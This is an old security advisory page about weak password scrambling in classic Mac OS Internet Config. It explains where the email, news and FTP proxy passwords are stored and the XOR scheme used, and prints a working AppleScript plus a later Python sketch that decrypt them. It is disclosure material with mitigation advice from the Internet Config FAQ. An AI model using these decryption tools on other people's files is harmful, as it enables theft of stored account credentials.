SecureMac.com
Internet Config Security Issues

IntConf
Well, System Cowboy has thrown together an application to decrypt the passwords for Internet Config: Decrypt-a-thon II. Side note: someone at TidBits sent me an email wanting me to tell the whole story on this bug. He wants me to say I've known about it a long time. Well, 'g', yes I have. I forgot about it, and now it's more info for the site.






Password weakness in Internet Config in MacOS

What is Internet Config?

From the Internet Config FAQ: "The Internet Configuration System was designed to make your life easier by reducing the number of times which you need to enter your Internet preferences into the various preferences dialogs of all your Internet applications. For example, currently you need to enter your Email address into many common Macintosh Internet applications, for example Eudora, NewsWatcher and Anarchie. The goal of the system was to get each of these applications to get this information from one common place and to give you a tool to edit these common preferences."

For example: when you install Power Mail 2.3.1 you can find Internet Config 2.0 in the Power Mail folder. You can use it to set your Internet configuration and then click on the "Use Internet Config" option when you set up your e-mail account. Internet Config allows you, among other things, to set the Email Password, News Password and FTP Proxy Password. All of these passwords are coded the same way.

Where can you find a password?

In the Internet Preferences file in the Preferences folder. Open this file using a resource editor (ResEdit, for instance) and open the ICRP resource. Here you can find the encrypted passwords: MailPassword, NewsAuthPassword and FTPProxyPassword. You can also find them with any hex editor, but the offset depends on the configuration.


Some examples:

09 38 3E 3F 31 2E 29 3D 34 30 = nightrain
08 14 3B 39 3A 31 1F 33 3A = BlackDog
09 3B 38 37 37 36 32 3B 35 2A = moonlight
06 19 02 0C 15 1B 0C = OUTLAW
05 37 27 28 35 3F = apple

The first byte is the length of the password, so we don't need it.

AA BB CC DD EE FF GG HH II JJ = aa bb cc dd ee ff gg hh ii jj

where:
AA BB CC DD EE FF GG HH II JJ - encrypted password (hex)
aa bb cc dd ee ff gg hh ii jj - decrypted password in ASCII codes (hex)

aa=AA XOR 56H
bb=BB XOR 57H
cc=CC XOR 58H
dd=DD XOR 59H
ee=EE XOR 5AH
ff=FF XOR 5BH
gg=GG XOR 5CH
hh=HH XOR 5DH
ii=II XOR 5EH
jj=JJ XOR 5FH
and so on...



An example:

38H XOR 56H = 6EH = n
3EH XOR 57H = 69H = i
3FH XOR 58H = 67H = g
31H XOR 59H = 68H = h
2EH XOR 5AH = 74H = t
29H XOR 5BH = 72H = r
3DH XOR 5CH = 61H = a
34H XOR 5DH = 69H = i
30H XOR 5EH = 6EH = n
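
The scheme above as a short Python sketch, added here as an example and not part of adix's advisory or the IC Programming Kit: it checks the length prefix, reverses the XOR for the page's five sample records, and shows that XORing any record with its known password leaves the same 56H, 57H, ... sequence, which is why the scrambling protects nothing. The function names, the Mac Roman text encoding and the key bytes past the tenth position (the page's "and so on...") are assumptions.

```python
# Added example (not from the advisory): the scrambling scheme above in Python.
KEY_START = 0x56  # key byte for the first character, per the page


def keystream(n: int) -> bytes:
    # Key byte i is 56H + i. Positions past the tenth follow the page's
    # "and so on..." and are an assumption; & 0xFF keeps each value a byte.
    return bytes((KEY_START + i) & 0xFF for i in range(n))


def parse_record(hex_text: str) -> bytes:
    """Return the scrambled bytes of a length-prefixed record, e.g. '05 37 ...'."""
    raw = bytes.fromhex(hex_text)
    if not raw:
        raise ValueError("empty record")
    if raw[0] != len(raw) - 1:
        raise ValueError(f"length byte {raw[0]} != {len(raw) - 1} data bytes")
    return raw[1:]


def unscramble(body: bytes) -> str:
    plain = bytes(c ^ k for c, k in zip(body, keystream(len(body))))
    return plain.decode("mac_roman")  # assumed classic Mac OS text encoding


def scramble(password: str) -> bytes:
    plain = password.encode("mac_roman")
    if len(plain) > 255:
        raise ValueError("a one-byte length prefix holds at most 255")
    body = bytes(p ^ k for p, k in zip(plain, keystream(len(plain))))
    return bytes([len(body)]) + body


def key_from_known_pair(hex_text: str, password: str) -> bytes:
    """XOR a record with its known plaintext: what is left is the key itself."""
    body = parse_record(hex_text)
    return bytes(c ^ p for c, p in zip(body, password.encode("mac_roman")))


# The five sample records printed on the page.
PAGE_SAMPLES = {
    "09 38 3E 3F 31 2E 29 3D 34 30": "nightrain",
    "08 14 3B 39 3A 31 1F 33 3A": "BlackDog",
    "09 3B 38 37 37 36 32 3B 35 2A": "moonlight",
    "06 19 02 0C 15 1B 0C": "OUTLAW",
    "05 37 27 28 35 3F": "apple",
}

if __name__ == "__main__":
    for record, expected in PAGE_SAMPLES.items():
        assert unscramble(parse_record(record)) == expected
        print(record, "->", expected, "| key:", key_from_known_pair(record, expected).hex(" "))
```

Every record yields a prefix of the same key sequence regardless of the password, so any value stored this way should be treated as plaintext.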



Solution:

Don't use it or at least don't enter any password. I wonder why Netscape supports it, for example.

Tested on:
Internet Config v.1.3, v.1.4, v.2.0 and v.2.0.2
Netscape Messenger 4.5, PowerMail 2.3.1, E(asy)-mail 2.0,

From the Internet Config FAQ: "The following programs supported Internet Config before 8 Nov 1995. NewsWatcher 2.0b21 and higher, Register 1.1 and higher, NotifyMail 2.5 and higher, BlitzMail 2.0.2 and higher, MacGzip 0.2.2 and higher, FTPd 2.4.0 and higher, ICeTEe 1.1 and higher, Internet Config Access, Mpack 1.5 and higher, BBEdit 3.1.1 and higher, NewsHopper 1.1 and higher, Anarchie 1.5.0 and higher, NCSA Telnet 2.6.1d7 and higher, Black Night 0.1.4 and higher, DropURL 1.1 and higher, CyberFinder, Symantec Project Manager 8.0.3 and higher, Personal Log 2.0 and higher, most programs based on the WASTE text editing engine, Claris Emailer, Fetch 3.0b5 and higher, PowerMail, ICScriptor, Kapito, Style 1.3.2 and higher, Internet Toolkit, NetSnagger."



A simple AppleScript to show the weakness of the password.

Usage: don't enter the first number and don't use spaces between the bytes.
For example: 383E3F312E293D3430, but not 09383E3F312E293D3430 or 38 3E 3F 31 2E 29 3D 34 30.

---CUT HERE---
(* IC Pass 2.1 by adix 21.07.99; Apple Script English *)

-- Ask for the encrypted password as hex digits (no length byte, no spaces)
set hex1 to text returned of (display dialog "Enter encrypted password:" default answer "" buttons {" Ok "} default button " Ok ")
-- Key bytes 56H to 5FH written out in binary, 8 bits per password character,
-- so this string covers passwords of up to ten characters
set Alicia to "01010110010101110101100001011001010110100101101101011100010111010101111001011111"
set pass to ""
set i to 1 -- position of the current hex digit pair in hex1
set skok to 0 -- bit offset of the current key byte in Alicia
set ile to count items in hex1
if ile = 1 or ile = 0 then
	set pass to ""
else
	repeat until (i > (ile - 1))
		set kodascii to 0
		set zn to items (i) thru (i + 1) in hex1
		set lbin to hex2bin(zn) as string
		-- XOR the encrypted byte with the key byte, one bit at a time
		repeat with a from 1 to 8
			set bit2 to item (a + skok) of Alicia
			set bit1 to item a of lbin
			if (bit1 = bit2) then
				set bitk to "0"
			else
				set bitk to "1"
			end if
			set kodascii to (kodascii + bitk * (2 ^ (8 - a)))
		end repeat
		set pass to (pass & (ASCII character kodascii))
		set skok to skok + 8
		set i to i + 2
	end repeat
end if
display dialog "Password:   " & pass & return & return & "by adix" buttons {" Ok "} default button " Ok "

-- Convert a list of hex digit characters to a string of binary digits
on hex2bin(zn)
	set temphex to {"0000", "0001", "0010", "0011", "0100", "0101", "0110", "0111", "1000", "1001", "1010", "1011", "1100", "1101", "1110", "1111"}
	set t2hex to "0123456789ABCDEF"
	set bin to "" as string
	repeat with j in zn
		set t1 to j as string
		repeat with i from 1 to (count items in t2hex)
			if ((item i in t2hex) = t1) then
				set temp to (item i in temphex)
				exit repeat
			end if
		end repeat
		set bin to (bin & temp) as string
	end repeat
	return (bin)
end hex2bin
---CUT HERE---



Dawid adix Adamski 

adixx@friko4.onet.pl 




Solutions

From the Internet Config FAQ: IC does provide the ability for applications to share preferences. Any information you enter into Internet Config can be accessed by any other software you execute on your machine. This includes preferences like the email password. You should be aware that such passwords are available to any software on your computer.

IC stores passwords in a non-secure fashion. While each password is scrambled to prevent idle viewing with ResEdit, the scrambling algorithm is publicly documented in the IC Programming Kit. Anyone with a trivial programming background can access these passwords.

Note: This situation is no different from the passwords you enter into other applications. When you ask a program (such as Users & Groups) to store a password, it must be stored in some file somewhere on your hard disk. The only difference is that IC provides a public API for getting at these passwords.

The important thing to keep in mind is that you should not install software that you do not trust on your machine. Note: If you ignore this advice (and install software you do not trust on to your computer), password secrecy is the least of your problems. Specifically, the Mac OS does not prevent a program from erasing the entire contents of your hard disk.

If you want to know which applications are accessing which IC preferences, you can install ICAccess Logger (ftp://ftp.stairways.com/stairways/hacks/).




All material (c) 2014 SecureMac.com and respected owners